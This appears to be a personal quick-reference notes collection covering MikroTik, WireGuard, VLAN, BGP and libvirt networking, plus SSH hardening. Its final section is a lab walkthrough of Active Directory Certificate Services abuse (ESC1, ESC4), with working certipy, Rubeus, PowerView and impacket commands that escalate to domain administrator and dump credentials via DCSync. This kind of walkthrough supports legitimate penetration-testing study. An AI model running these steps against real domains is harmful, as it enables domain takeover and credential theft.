
About

Introduction

Documentation for utilities and applications, when it exists at all, is often too verbose, with no indication of which information has higher priority or is used more often. Furthermore, when you attempt to use the technology, it often fails to work as described under the given conditions.

Because of this, I’ve decided to create this repository to document tested techniques and practical usage examples for the different kinds of technology I come across, in the form of quick references.

Development

This is very far from complete: I will slowly be populating this repository with content from my local notes; I have lots of things to share.

All content on this blog is intended solely for educational purposes, research, and authorized assessments. The author assumes no responsibility for any misuse of the information provided.

VPLS

MT ROS setup

# R1 (IP : 10.0.0.1)
/interface/bridge/add name=vpls-tun-1
# vpls-id is just a tunnel identifier, you can use whatever, but people usually use their AS number
# note the X:X format !!!
/interface/vpls/add name=vpls-tun-4-3 vpls-id=1:102 peer=10.0.0.2

## join route-to-customer and vpls-tunnel together using a bridge
#  add vpls tunnel to bridge
/interface/bridge/port/add interface=vpls-tun-4-3 bridge=vpls-tun-1
# add customer-facing interface to a bridge
/interface/bridge/port/add interface=ether4 bridge=vpls-tun-1


# R2 (IP : 10.0.0.2)
/interface/bridge/add name=vpls-tun-1
/interface/vpls/add name=vpls-tun-4-3 vpls-id=1:102 peer=10.0.0.1
/interface/bridge/port/add interface=vpls-tun-4-3 bridge=vpls-tun-1
/interface/bridge/port/add interface=ether4 bridge=vpls-tun-1

# check
/interface/vpls/monitor


# clients can now set addresses on their upstream interfaces (the ones connected to your routers) and communicate with each other on the same subnet (you do NOT need to set any addresses on your routers themselves)
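As a quick client-side sketch (assuming the customer devices are also RouterOS boxes; the interface names and the 10.99.0.0/24 subnet are made up for illustration):

```
# client A (plugged into R1's ether4)
/ip/address/add address=10.99.0.1/24 interface=ether1
# client B (plugged into R2's ether4)
/ip/address/add address=10.99.0.2/24 interface=ether1
# client A should now reach client B at L2 across the VPLS tunnel
/ping 10.99.0.2
```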

VXLAN

MT ROS setup

#### customer router
### on customer's side you CAN also configure VLANs to separate traffic

### R1 (IP : 10.0.0.1)
/interface vxlan add name=vxlan-vni-102 vni=102
/interface vxlan vteps add interface=vxlan-vni-102 remote-ip=10.0.0.2
/interface/bridge/add name=vxlan-br-102
# ether12 goes to customer's router
/interface/bridge/port/add interface=ether12 bridge=vxlan-br-102
/interface/bridge/port/add interface=vxlan-vni-102 bridge=vxlan-br-102

### R2 (IP : 10.0.0.2)
/interface vxlan add name=vxlan-vni-102 vni=102
/interface vxlan vteps add interface=vxlan-vni-102 remote-ip=10.0.0.1
/interface/bridge/add name=vxlan-br-102
# ether12 goes to customer's router
/interface/bridge/port/add interface=ether12 bridge=vxlan-br-102
/interface/bridge/port/add interface=vxlan-vni-102 bridge=vxlan-br-102

Wireguard

WG tunnel to LAN on MT ROS & debian

/interface/wireguard/add listen-port=11111 name=wireguard1
# this is the subnet that the clients will "tunnel out of"
# each client must have an allowed-address from 192.168.100.0/24
/ip/address/add address=192.168.100.1/24 interface=wireguard1

# [admin@home] > /interface wireguard print 
#     Flags: X - disabled; R - running 
#      0  R name="wireguard1" mtu=1420 listen-port=11111 private-key="SERVER_PRIVATE_KEY"
#           public-key="SERVER_PUBLIC_KEY"

/interface/wireguard/peers/add allowed-address=192.168.100.2/32 interface=wireguard1 public-key="CLIENT_PUBLIC_KEY" preshared-key="PEER_PSK"

/ip/firewall/filter/add action=accept chain=input comment="allow WireGuard" dst-port=11111 protocol=udp place-before=1
/interface/list/member/add interface=wireguard1 list=LAN

/ip/firewall/nat/add action=src-nat chain=srcnat src-address=192.168.100.0/24 to-addresses=192.168.88.1

Connect from debian:

wg genkey | sudo tee /etc/wireguard/private.key
sudo cat /etc/wireguard/private.key | wg pubkey | sudo tee /etc/wireguard/public.key
wg genpsk | sudo tee /etc/wireguard/preshared.key

sudo nvim /etc/wireguard/wg0.conf
# [Interface]
# PrivateKey = CLIENT_PRIVATE_KEY
# # this client's address on the destination device
# Address = 192.168.100.2/32
# DNS = 192.168.100.1
# 
# [Peer]
# PresharedKey = PEER_PSK
# PublicKey = SERVER_PUBLIC_KEY
# # defines which dst-address will go through the tunnel
# # example: AllowedIPs = 0.0.0.0/0
# AllowedIPs = 192.168.100.0/24, 192.168.88.0/24
# Endpoint = xxx.xxx.xxx.xxx:11111

# or nm-connection-editor
sudo nmcli connection import type wireguard file /etc/wireguard/wg0.conf
nmcli connection
# or using wg-quick
wg-quick up wg0

DNS

DoH

MT ROS setup

# set the cloudflare server ("servers" is used to resolve the DoH server's own hostname; use-doh-server is the DoH server address)
# after the DoH server address is resolved, all other DNS requests will be made via DoH
/ip/dns/set verify-doh-cert=yes allow-remote-requests=yes doh-max-concurrent-queries=100 doh-max-server-connections=20 doh-timeout=6s servers=1.1.1.1 use-doh-server=https://cloudflare-dns.com/dns-query

# fetch the cert chain (served here from a local HTTP server)
/tool/fetch url=http://192.168.60.1:9595/one-one-one-chain.pem
/file/print

/certificate/import file-name=one-one-one-chain.pem
# certificates-imported: 3

Misc

MT ROS update static DNS entries from DHCP

# note: quotes and $ inside the quoted source string must be escaped with a backslash
/system/script/add name=update-dns-from-dhcp policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive source="
:local domain \".aperture.ad\";
:local leases [/ip dhcp-server lease find dynamic=yes];

:foreach i in=[/ip dns static find where name~\$domain] do={
    /ip dns static remove \$i;
}

:foreach i in=\$leases do={
    :local hostname [/ip dhcp-server lease get \$i host-name];
    :local address [/ip dhcp-server lease get \$i address];

    :if ([:len \$hostname] > 0) do={
        :local fqdn (\$hostname . \$domain);
        /ip dns static add name=\$fqdn address=\$address ttl=5m comment=\"From DHCP lease\";
    }
}
"

/system scheduler add name=update-dns-from-dhcp interval=5m on-event="/system script run update-dns-from-dhcp"

DRP

BFD

MT ROS setup

# enable BFD on interfaces (you can just use interfaces=all)
# `min-tx/min-rx = 1` means 1 second interval
/routing/bfd/configuration/add interfaces=ether5,ether6,ether7,ether8 min-tx=1 min-rx=1
# then in OSPF/BGP/whatever config set use-bfd=yes on an interface so that it will send BFD hello packets

OSPF

MT ROS setup

# create a loopback for fault tolerance
/interface/bridge/add name=Lo0

# first assign IP addresses
/ip/address/add interface=Lo0 address=10.0.0.4/32
/ip address add address=192.168.0.3/24 interface=ether1
/ip address add address=192.168.1.3/24 interface=ether2

/routing ospf instance add name=ospfv2-inst version=2 router-id=10.0.0.4
# area-id is usually 0.0.0.0, 1.1.1.1, 2.2.2.2, etc.
/routing ospf area add name=ospfv2-a0 area-id=0.0.0.0 instance=ospfv2-inst

### if interfaces are not specified, ROS will detect them automatically!
### use-bfd can be omitted! if it's not - see the BFD section above for bfd configuration
/routing ospf interface-template add networks=192.168.0.0/24,192.168.1.0/24,10.0.0.4/32 area=ospfv2-a0 interfaces=ether3,bond-9-2,Lo0 use-bfd=yes

# allow ospf traffic (not needed if no filter rules are present)
/ip firewall filter add action=accept chain=input protocol=ospf

FHRP

VRRP

MT ROS setup

  1. vrid is an ID of a VIRTUAL router; each virtual router needs a unique ID.
  2. authentication=none is the default; non-none values are only supported if version != 3.
  3. priority=100 is the default (higher priority wins!).
  4. Upon entering a backup state, the IP address assigned to the VRRP interface SHOULD become Invalid; this is expected!
#    |----|          |----|  
#    | R1 |          | R2 |
#    |----| ether2   |----|
#       |  \__    __/  | <------ ether1
#       |     \__/     |
#    |----|___/  \___|----|      
#    | S1 |          | S2 |
#    |----|==========|----|


### R1 (mirror on R2 with lower priorities):
# OPT: real iface address:
/ip address add address=192.168.1.1/24 interface=ether1

# can be assigned on a VLAN interface (interface=vlan-20)
/interface vrrp add name=vrrp-1 interface=ether1 vrid=1 priority=250
# or the same, with AH authentication (non-none authentication is VRRP version 2 only):
/interface vrrp add name=vrrp-1 interface=ether1 vrid=1 priority=250 authentication=ah password=somepass1 version=2
# OPT: if you have multiple gateways on downstream switches:
/interface vrrp add name=vrrp-2 interface=ether1 vrid=2 priority=240 authentication=ah password=somepass2 version=2
# OPT: if you have multiple downstream nodes interconnected with VRRP routers in mesh for redundancy:
# priorities should be set to higher values on a master router. vrid should be the same on all interfaces that have
# the same VIP address
/interface vrrp add name=vrrp-3 interface=ether2 vrid=1 priority=230 authentication=ah password=somepass1 version=2

# virtual addresses (HAVE TO BE /32):
# you CAN assign multiple ip addresses to a single VRRP interface and single VRID
/ip address add address=192.168.1.101/32 interface=vrrp-1
# OPT: if you have multiple gateways on downstream switches:
/ip address add address=10.10.1.102/32 interface=vrrp-2
# OPT: if you have multiple downstream nodes interconnected with VRRP routers in mesh for redundancy:
/ip address add address=192.168.1.101/32 interface=vrrp-3

VLAN

MT ROS setup

frame-types:

# only tagged traffic will be sent out (set this on trunk ports)
# (if you set it on the bridge, it means only tagged traffic will be sent OUT OF THE TRUNK PORT)
# be careful setting this: you will not be able to send packets from the router itself out of trunk ports
frame-types=admit-only-vlan-tagged

# only untagged traffic will be sent out (set this on access ports)
frame-types=admit-only-untagged-and-priority-tagged
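A small sketch combining the two (assuming an existing vlan-filtering bridge named br1; the port names are arbitrary):

```
# trunk port: accept/emit tagged frames only
/interface/bridge/port/add bridge=br1 interface=ether1 frame-types=admit-only-vlan-tagged
# access port for VLAN 20: accept/emit untagged frames only
/interface/bridge/port/add bridge=br1 interface=ether2 pvid=20 frame-types=admit-only-untagged-and-priority-tagged
```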

VLAN switching:

# {https://forum.mikrotik.com/viewtopic.php?t=180903}
# add a bridge for vlan switching (a single bridge should generally be used; if multiple bridges are used, bridging cannot be hardware-offloaded (i.e. more CPU load))
/interface/bridge/add name=vlan-br-1 vlan-filtering=yes # WARNING!!! if you're connected to router remotely FIRST OMIT vlan-filtering option, since it will break the connection
# priority=0x5000 - possible if you wanna adjust STP (or MSTP/RSTP) priority value (the lower the priority the more chance it'll become the root bridge)
# frame-types=admit-only-vlan-tagged - POSSIBLE, BUT DANGEROUS

# attach physical interface to a virtual bridge interface (trunk). Don't forget to add appropriate bridge VLAN table entries
/interface/bridge/port/add bridge=vlan-br-1 interface=ether1
# frame-types=admit-only-vlan-tagged - POSSIBLE, BUT DANGEROUS (not required)

# attach physical interface to a virtual bridge interface (access). Don't forget to add appropriate bridge VLAN table entries
/interface/bridge/port/add bridge=vlan-br-1 interface=ether2 pvid=20
/interface/bridge/port/add bridge=vlan-br-1 interface=ether3 pvid=30
# frame-types=admit-only-untagged-and-priority-tagged - POSSIBLE, BUT DANGEROUS (not required)

# add a bridge VLAN table entry for each VLAN (if multiple interfaces are connected to ONE VLAN, specify them all); untagged interfaces are the access ports for that VLAN
# and set /ip/dns/set allow-remote-requests=yes
# REPEAT this sequence on each switch along the path
/interface/bridge/vlan/add bridge=vlan-br-1 tagged=ether1,vlan-br-1 untagged=ether2 vlan-ids=20
/interface/bridge/vlan/add bridge=vlan-br-1 tagged=ether1,vlan-br-1 untagged=ether3,ether4 vlan-ids=30

# Add a vlan interface (an L3 interface for a particular VLAN (e.g. 20) on the bridge) (don't forget to add an address to it and a corresponding entry in the bridge VLAN table afterwards)
/interface/vlan/add name=vlan-20 vlan-id=20 interface=vlan-br-1
/interface/vlan/add name=vlan-30 vlan-id=30 interface=vlan-br-1
# add upstream address for clients
/ip/address/add address=10.10.20.1/24 interface=vlan-20 # don't forget to write different addresses on second router for VRRP
/ip/address/add address=10.10.30.1/24 interface=vlan-30


# on each router / managed switch along the path enable NAT masquerade
/ip/firewall/nat/add chain=srcnat out-interface=vlan-br-1 action=masquerade


# afterwards you can create a dhcp server (interface=vlanX)
/ip/pool/add name=vlan-20-pool ranges=192.168.20.100-192.168.20.200
/ip/dhcp-server/add interface=vlan-20 address-pool=vlan-20-pool name=vlan-20-dhcp
/ip/dhcp-server/network/add address=192.168.20.0/24 dns-server=192.168.20.1 gateway=192.168.20.1 netmask=24
/ip/pool/add name=vlan-30-pool ranges=192.168.30.100-192.168.30.200
/ip/dhcp-server/add interface=vlan-30 address-pool=vlan-30-pool name=vlan-30-dhcp
/ip/dhcp-server/network/add address=192.168.30.0/24 dns-server=192.168.30.1 gateway=192.168.30.1 netmask=24

## if you're configuring VXLAN - clients should already be able to reach each other on both sides of VXLAN
## if you want your routers to be reachable, on both routers assign single-subnet address ON A BRIDGE
# R1
/ip/address/add address=172.16.102.1/24 interface=vlan-br-1
# R2
/ip/address/add address=172.16.102.2/24 interface=vlan-br-1

OPTIONAL: add VRRP

### MIRROR THIS CONFIGURATION ON A SECOND ROUTER, BUT WITH DIFFERENT PRIORITY
/interface vrrp add name=vrrp-m-20 interface=vlan-20 vrid=20 priority=200
/interface vrrp add name=vrrp-m-30 interface=vlan-30 vrid=30 priority=200

# pay attention: addresses should be reachable from clients on VLAN
# This SHOULD be /32 !!!
/ip address add address=192.168.20.3/32 interface=vrrp-m-20
/ip address add address=192.168.30.3/32 interface=vrrp-m-30

/ip/dhcp-server/network/add address=192.168.20.0/24 gateway=192.168.20.3 dns-server=192.168.20.3
/ip/dhcp-server/network/add address=192.168.30.0/24 gateway=192.168.30.3 dns-server=192.168.30.3

OPTIONAL: VLAN isolation

/ip/firewall/filter/add action=drop chain=forward dst-address=192.168.55.0/27 src-address=192.168.80.0/24
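Note that a single rule only drops one direction of forwarded traffic; for full isolation you likely want the mirror rule as well (a sketch using the same example subnets):

```
/ip/firewall/filter/add action=drop chain=forward dst-address=192.168.80.0/24 src-address=192.168.55.0/27
```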

BGP

eBGP

MT ROS setup

# make router-id a local router loopback address (optional)
# remote.as if not specified will be automatically determined
/routing/bgp/connection/add name=bgp-65100 as=65200 router-id=10.0.0.3 remote.address=38.65.83.201 remote.as=65100 local.role=ebgp local.address=20.84.87.139 connect=yes listen=yes
# now, mirror this config for 2nd router (AS 65100) and the entry should appear under:
/routing/bgp/session/print

# eBGP functions now, but doesn't do anything
# in order for your eBGP session to actually exchange routes, both peers (i.e. both AS') need the "output.network" setting configured.
/routing/bgp/connection/set numbers=0 output.network=bgp-65100-out
/ip/firewall/address-list/add list=bgp-65100-out address=10.3.1.0/24
/ip/firewall/address-list/add list=bgp-65100-out address=10.3.2.0/24
# try to check /ip/route/print on the AS65100 router; it should learn the routes you advertised here
# now, mirror this config on the 2nd router (AS 65100) and set the routes it should advertise to the AS65200 router

ARP

Harvesting

arp-scan

arp-scan -i 100 -I eth0 192.168.0.0/16

MikroTik RouterOS

MAC TELNET

/ip/service/enable numbers=telnet
/interface/print

sudo apt install mactelnet-client
mactelnet $MAC

flash

sudo nvim /etc/network/interfaces
# auto enx00e04c36350d
# iface enx00e04c36350d inet static
#     address 192.168.88.2/24
#     gateway 192.168.88.1

sudo systemctl restart networking

sudo ./netinstall-cli -r -a 192.168.88.1 mt/routeros-7.20-arm64.npk mt/container-7.20-arm64.npk mt/user-manager-7.20-arm64.npk mt/wifi-qcom-7.20-arm64.npk

# connect to WAN port

# now you can proceed to boot the device into EtherBoot mode (power on the device while holding the reset button until the LED stops blinking)

ssh by key

/file/add name=mtusr.pub contents="ssh-ed25519 thisismypublickey usr@debian" type=file
/user ssh-keys import public-key-file=mtusr.pub user=mtusr
/ip ssh set strong-crypto=yes
/ip ssh set always-allow-password-login=no

Libvirt networking

Misc

Create a NAT network

<network>
  <name>fcos_k8s_lab</name>
  <uuid>280c4dd6-e5e4-478b-aa71-6d7aaa326eae</uuid>
  <forward mode='nat'/>
  <bridge name='k8sbr0' stp='on' delay='0'/>
  <mac address='52:54:00:fd:d7:c7'/>
  <domain name='k8s.local'/>
  <dns enable='yes'>
    <forwarder addr='1.1.1.1'/>
  </dns>
  <ip family='ipv4' address='192.168.122.1' prefix='24'>
    <dhcp>
      <range start='192.168.122.2' end='192.168.122.254'/>
      <!-- <host mac='50:73:0F:31:81:E1' name='coreos01' ip='192.168.122.101'/> -->
      <!-- <host mac='50:73:0F:31:81:E2' name='coreos02' ip='192.168.122.102'/> -->
      <!-- <host mac='50:73:0F:31:81:F1' name='coreos03' ip='192.168.122.103'/> -->
      <!-- <host mac='50:73:0F:31:81:F2' name='coreos04' ip='192.168.122.104'/> -->
    </dhcp>
  </ip>
</network>

attach multiple interfaces to 1 host

### ATTACH A BRIDGE TO HOST/ANOTHER VM
# this will create the corresponding virtual NIC on a VM
# get rid of --persistent if you just want a temporary interface
# virbr15 is the bridge interface for the network you wanna attach. You can create it manually using `ip`
virsh attach-interface --type bridge --source virbr15 --model virtio --domain mt-chr-1 --persistent

### ATTACH TO A NETWORK
# this network needs to be created with libvirt as a 'network'
virsh attach-interface --type network --source ad_lab --model virtio --domain mt-chr-1 --persistent

basic network definition template

You may use virsh net-define /usr/share/libvirt/networks/default.xml to define an initial network configuration.

<network>
  <name>advenv_net</name>
<!-- ensure UUID is valid -->
  <uuid>dcd932a5-6ba1-4d46-b56e-2c7ec8722e58</uuid>
  <forward mode='nat'/>
<!-- this bridge interface will be created automatically by libvirt  -->
<!-- and all virtual tap/tun VM's interfaces will be attached to it also automatically -->
  <bridge name='virbr1' stp='on' delay='0'/>
<!-- ensure MAC is valid -->
  <mac address='52:54:00:ff:a0:64'/>
  <domain name='advenv.local'/>
  <dns enable='no'/>
<!-- CIDR for a bridge interface -->
  <ip family='ipv4' address='10.0.100.1' prefix='24'>
<!-- DHCP rules -->
    <dhcp>
      <range start='10.0.100.2' end='10.0.100.254'/>
<!-- host mapping is OPTIONAL -->
      <host mac='52:54:00:52:D8:3A' name='dc-2' ip='10.0.100.2'/>
      <host mac='b0:ee:79:6d:50:3f' name='debian1' ip='10.0.100.15'/>
      <host mac='aa:df:3a:fe:eb:a4' name='debian2' ip='10.0.100.20'/>
    </dhcp>
  </ip>
</network>

bridge a libvirt guest domain to physical LAN

Scenario:

  • DHCP server is running on physical router
  • debian host running libvirtd (host’s address == 192.168.1.69)
  • debian libvirt/qemu VM (VM’s address == 192.168.1.100)

sudo apt install bridge-utils

# on the host
sudo vim /etc/network/interfaces
# auto br0
# iface br0 inet static
#     address 192.168.1.69/24
#     gateway 192.168.1.1
#     bridge_ports enp3s0
#     bridge_stp off
#     bridge_fd 0
#     bridge_maxwait 0

# on the VM
sudo vim /etc/network/interfaces
# auto enp1s0
# iface enp1s0 inet static
#     address 192.168.1.100/24
#     gateway 192.168.1.1

# VM (domain) definition
virsh edit dc-1
# <interface type='bridge'>
#   <source bridge='br0'/>
#   <model type='virtio'/>
# </interface>

# on the host
sudo systemctl restart networking

# ensure correct interface layout on host
ip a
# 2: enp3s0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel master br0 state UP group default qlen 1000
#     link/ether 74:56:3c:91:53:35 brd ff:ff:ff:ff:ff:ff
#     altname enx74563c915335
# 3: br0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
#     link/ether ee:58:46:54:ea:9c brd ff:ff:ff:ff:ff:ff
#     inet 192.168.1.69/24 brd 192.168.1.255 scope global br0
#        valid_lft forever preferred_lft forever
#     inet6 fe80::ec58:46ff:fe54:ea9c/64 scope link proto kernel_ll
#        valid_lft forever preferred_lft forever

# on VM
ip a
# 2: enp1s0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
#     link/ether 52:54:00:eb:a8:c2 brd ff:ff:ff:ff:ff:ff
#     altname enx525400eba8c2
#     inet 192.168.1.100/24 brd 192.168.1.255 scope global enp1s0
#        valid_lft forever preferred_lft forever
#     inet6 fe80::5054:ff:feeb:a8c2/64 scope link proto kernel_ll
#        valid_lft forever preferred_lft forever

Troubleshooting

fix NAT issues (nftables)

fix libvirt domains’ traffic on NAT networks not being masqueraded

cat /etc/default/ufw | grep DEFAULT_FORWARD_POLICY
# DEFAULT_FORWARD_POLICY="DROP" -------> ACCEPT
DEFAULT_FORWARD_POLICY="ACCEPT"

ufw reload

Fix libvirt domains’ traffic on NAT networks not being masqueraded if libvirt is using nftables backend (e.g. on fedora42 where iptables is deprecated)

sudo grep 'firewall_backend' /etc/libvirt/network.conf
# firewall_backend = "nftables"

# 1) attempt to purge nftables ruleset
sudo nft flush ruleset

# 2.1) ensure firewalld (or whatever frontend you are using) repopulates nft ruleset
sudo systemctl restart firewalld
# 2.2) ensure libvirtd is started before libvirt_network is started
sudo systemctl restart libvirtd

# 3) ensure nftables ruleset is repopulated by firewalld
sudo nft list ruleset

# 4) ensure kernel forwarding is enabled
sysctl net.ipv4.ip_forward
# net.ipv4.ip_forward = 1

# 5) start all necessary resources
virsh net-start --network default
virsh start debian-tmp-1
virsh console --domain debian-tmp-1
# ping 1.1.1.1

fix libvirt dnsmasq address already in use issue

sudo rc-update del dnsmasq
sudo rc-service dnsmasq stop

OR

### /etc/dnsmasq.conf
# make dnsmasq listen on a specific interface
interface=eth0
# OR make dnsmasq listen on a specific address
listen-address=192.168.0.1

# AND uncomment this line
bind-interfaces

SSHD

Reasonably secure setup

  1. Change sshd security settings
######## /etc/ssh/sshd_config
### do NOT install sudo

### DISABLE ROOT LOGIN
AllowUsers $USERNAME
PermitRootLogin no

### DISABLE PASSWORD AUTHENTICATION
PasswordAuthentication no
KbdInteractiveAuthentication no
UsePAM no
PubkeyAuthentication yes

### ALTERNATIVELY: REQUIRE BOTH PASSWORD AND PRIVATE KEY
AuthenticationMethods publickey,password
PasswordAuthentication yes

### change default port
Port 5555
  2. Enable FW
ufw enable
  3. Create an unprivileged user
adduser myuser
  4. Setup autoupdate
### DEBIAN
sudo apt update && sudo apt upgrade
sudo apt install unattended-upgrades

# /etc/apt/apt.conf.d/50unattended-upgrades
# ensure the following are present. (they are present by default)
"origin=Debian,codename=${distro_codename},label=Debian";
"origin=Debian,codename=${distro_codename},label=Debian-Security";
"origin=Debian,codename=${distro_codename}-security,label=Debian-Security";

sudo systemctl start unattended-upgrades
sudo systemctl enable unattended-upgrades

# observe
cat /var/log/unattended-upgrades/unattended-upgrades.log

  5. Setup port knocking
# install knockd
apt install knockd

### /etc/knockd.conf
[options]
UseSyslog
Interface = enp3s0

[SSH]
sequence    = 7000,8000,9000
seq_timeout = 5
tcpflags    = syn
start_command = ufw allow from %IP% to any port 5555
stop_command = ufw delete allow from %IP% to any port 5555
cmd_timeout   = 60


### /etc/default/knockd
START_KNOCKD=1
KNOCKD_OPTS="-i enp3s0"

# usage with port knocking
for port in 7000 8000 9000; do nmap -Pn --max-retries 0 -p $port $MY_SRV; done
ssh -i $SSH_KEY_PATH -p 5555 myuser@$MY_SRV

ADCS

ESC1

Execute

# enumerate existing templates
certipy-ad find -scheme ldap -u TestAlpha@contoso.org -p 'win10-gui-P@$swd' -dc-ip 192.168.68.64 -stdout -vulnerable -enabled
# Certificate Authorities
#   0
#     CA Name                             : contoso-WIN-KML6TP4LOOL-CA-9
# ...
# 
# Certificate Templates
#   0
#     Template Name                       : Workstation
#     Display Name                        : Workstation Authentication
#     Certificate Authorities             : contoso-WIN-KML6TP4LOOL-CA-9
#     Enabled                             : True
#     Client Authentication               : True
#     Extended Key Usage                  : Client Authentication
#     Requires Manager Approval           : False
#     Validity Period                     : 1 year
#     Renewal Period                      : 6 weeks
#     Minimum RSA Key Length              : 2048
#     Permissions
#       Enrollment Permissions
#         Enrollment Rights               : CONTOSO.ORG\Domain Admins
#                                           CONTOSO.ORG\Authenticated Users
#     [!] Vulnerabilities
#       ESC1                              : 'CONTOSO.ORG\\Domain Computers' and 'CONTOSO.ORG\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
##############
### TEST-1 ### PKINIT not supported
##############
### WARNING ::: you cannot use shadow-credentials certificates to log on to LDAP, only a legitimately obtained one! it has to be signed by the CA.

certipy-ad req -u TestAlpha@contoso.org -p 'win10-gui-P@$swd' -target WIN-KML6TP4LOOL.contoso.org -ca contoso-WIN-KML6TP4LOOL-CA-9 -template Workstation -upn administrator@contoso.org -dc-ip 192.168.68.64 -debug
# [*] Successfully requested certificate
# [*] Got certificate with UPN 'administrator@contoso.org'
# [*] Saved certificate and private key to 'administrator.pfx'

# attempt to request a TGT using PKINIT
# if you get the following error that means DC's KDC certificate doesn't support PKINIT (because DC's certificate doesn't have "KDC Authentication" EKU)
certipy-ad auth -pfx ./administrator.pfx -dc-ip 192.168.68.64 -domain contoso.org
# [*] Using principal: administrator@contoso.org
# [*] Trying to get TGT...
# [-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)

# got an error, so let's authenticate to LDAPS using mTLS then (passthecert.py)
# export public and private keys from a pfx file to a separate files
certipy-ad cert -pfx administrator.pfx -nocert -out administrator.key
# [*] Writing private key to 'administrator.key'
certipy-ad cert -pfx administrator.pfx -nokey -out administrator.cert
# [*] Writing certificate and  to 'administrator.cert'

# use certificates for mTLS LDAPS bind instead of PKINIT. This will rely on LDAP privileges the user has.
python3 ../utils/passthecert.py -action ldap-shell -crt administrator.cert -key administrator.key -domain contoso.org -dc-ip 192.168.68.64
# whoami
# # u:CONTOSO\Administrator


##############
### TEST-2 ### PKINIT supported
##############
# trying to get a TGT using a computer account (WIN-NUU0DPB1BVC) certificate
# the KDC (192.168.68.179) should have a certificate with "KDC Authentication" EKU issued
# after we got a TGT it tries to abuse U2U to itself (*see krb5.norg -> U2U abuse*) 
# in order to retrieve NT hash
certipy-ad auth -pfx ./WIN-NUU0DPB1BVC\$.pfx -dc-ip 192.168.68.179 -domain contoso.org -debug
# [*] Using principal: win-nuu0dpb1bvc$@contoso.org
# [*] Got TGT
# [*] Saved credential cache to 'win-nuu0dpb1bvc.ccache'
# [*] Got hash for 'win-nuu0dpb1bvc$@contoso.org': aad3b435b51404eeaad3b435b51404ee:d0773d3d8ae3a0f436b2b7e649faa137


# we can request an ST for that computer using hashes
export KRB5CCNAME='win-nuu0dpb1bvc.ccache'
impacket-getST -hashes aad3b435b51404eeaad3b435b51404ee:d0773d3d8ae3a0f436b2b7e649faa137 -spn CIFS/WIN-KML6TP4LOOL.contoso.org -dc-ip 192.168.68.64 contoso.org/WIN-NUU0DPB1BVC
# [*] Getting ST for user
# [*] Saving ticket in WIN-NUU0DPB1BVC@CIFS_WIN-KML6TP4LOOL.contoso.org@CONTOSO.ORG.ccache

# let's use the ST (pass-the-ticket) to DCSync using impacket-secretsdump
export KRB5CCNAME='WIN-NUU0DPB1BVC@CIFS_WIN-KML6TP4LOOL.contoso.org@CONTOSO.ORG.ccache'
impacket-secretsdump -outputfile contoso.org.dump -k WIN-KML6TP4LOOL.contoso.org

# we can also perform secretsdump using just hashes (NOTE THE '$' SIGN AFTER COMPUTERNAME !!!!)
impacket-secretsdump -outputfile contoso.dump -hashes aad3b435b51404eeaad3b435b51404ee:d0773d3d8ae3a0f436b2b7e649faa137 'CONTOSO.ORG/WIN-NUU0DPB1BVC$@192.168.68.64'


##############
### !!UT!! ###
##############
# scan ADCS for vulnerable templates
Certify.exe find /vulnerable

# request a certificate specifying an "alternative name"
Certify.exe request /ca:ca.domain.local\ca /template:VulnTemplate /altname:TargetUser

# convert a certificate from .pem to .pfx
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

# request a TGT for the user using Rubeus
Rubeus.exe asktgt /user:TargetUser /certificate:C:\Temp\cert.pfx

# remember: one session can only contain one TGT - you can use "runas /netonly"
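A sketch of that workflow (hedged: the domain, user, and ticket path are placeholders):

```
runas /netonly /user:CONTOSO\TargetUser cmd.exe
# then, inside the new window, import the ticket into the fresh session:
Rubeus.exe ptt /ticket:C:\Temp\ticket.kirbi
klist
```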

Prerequisites

  1. EKU: Client Authentication
  2. Template has to be enabled
  3. Requires Manager Approval: FALSE
  4. Enrollee Supplies Subject: True
  5. You have to have Enrollment Rights to enroll to that template.
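The prerequisites above can be evaluated mechanically; a minimal Python sketch over a hypothetical dict mirroring the certipy output fields shown earlier (field names here are my own, not certipy's):

```python
def is_esc1(tpl: dict) -> bool:
    """Check the five ESC1 prerequisites against a parsed template."""
    return (
        tpl["enabled"]                                      # template is enabled
        and not tpl["requires_manager_approval"]            # no manager approval
        and tpl["enrollee_supplies_subject"]                # enrollee supplies subject
        and "Client Authentication" in tpl["extended_key_usage"]
        and tpl["can_enroll"]                               # caller has enrollment rights
    )

# the "Workstation" template from the enumeration output above
workstation = {
    "enabled": True,
    "requires_manager_approval": False,
    "enrollee_supplies_subject": True,
    "extended_key_usage": ["Client Authentication"],
    "can_enroll": True,
}
print(is_esc1(workstation))  # True
```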

ESC4

Execute

### CERTIPY
# PAY ATTENTION TO "Write Owner Principals", "Write Dacl Principals", "Write Property Principals"
certipy-ad find -scheme ldap -u Administrator@contoso.org -p 'win2016-cli-P@$swd' -dc-ip 192.168.68.64 -stdout

### BLOODHOUND
rusthound -d contoso.org -u 'TestAlpha@contoso.org' -p 'win10-gui-P@$swd' -o /tmp/rusthound.txt -z
#################
### POWERVIEW ###
#################
# CHECK: Retrieve all certificate templates and their ACEs
Get-DomainObjectAcl -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=local" -LDAPFilter "(objectclass=pkicertificatetemplate)" -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_}
# if the command shows ActiveDirectoryRights: WriteProperty on a template - you can edit it to your needs

# EDIT TEMPLATE: if you are able to edit the certificate template, you can make it vulnerable to ESC1
# to do so, change the value of the mspki-certificate-name-flag attribute to "1" and add "Client Authentication (1.3.6.1.5.5.7.3.2)" to pkiextendedkeyusage and/or mspki-certificate-application-policy
Set-DomainObject -Identity VulnCert -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=local" -LDAPFilter "(objectclass=pkicertificatetemplate)" -XOR @{'mspki-certificate-name-flag' = '1'}
